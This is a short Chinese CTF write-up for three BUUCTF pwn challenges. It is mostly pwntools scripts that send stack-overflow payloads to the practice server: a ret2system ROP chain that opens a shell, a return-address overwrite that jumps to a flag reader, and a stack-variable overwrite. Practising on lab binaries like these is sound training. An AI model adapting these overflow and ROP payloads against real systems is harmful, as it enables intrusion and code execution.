练习平台Buuctf
RIP
gdb调试,没有PIE,直接利用gets溢出,利用pop rdi ; ret
控制,ret2system(整复杂了,ida看一下控制ret流就可以了)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| from pwn import * context.log_level="debug"
io = remote('node4.buuoj.cn', 29531) elf = ELF('./pwn1')
pop_rdi_ret = 0x00000000004011fb
sh_addr = next(elf.search(b'/bin/sh')) ret = pop_rdi_ret+1 system_addr = elf.symbols['system']
print("[+] sh addr: {}".format(hex(sh_addr))) print("[+] system addr: {}".format(hex(system_addr)))
payload = b'A'* 23 + p64(pop_rdi_ret) + p64(sh_addr) + p64(ret) + p64(system_addr)
io.send(payload) io.interactive()
|
warmup_csaw_2016
控制ret地址,直接读flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| from pwn import * context.log_level="debug"
io = remote('node4.buuoj.cn', 29490)
elf = ELF('./warmup_csaw_2016')
io.recvuntil(b"WOW:")
cat_flag_addr = int(io.recv(8),16)
io.send(b'A'*0x48+p64(cat_flag_addr))
io.interactive()
|
ciscn_2019_n_1
需要gets溢出,覆盖stack中的v2值
1 2 3 4 5 6 7 8 9 10 11 12 13
| from pwn import * context.log_level="debug"
io = remote('node4.buuoj.cn', 29083)
v2 = 0x41348000
io.recvuntil(b"number.\n") io.sendline(b"A"*(0x30-0x4) + p64(v2)) io.recv() io.interactive()
|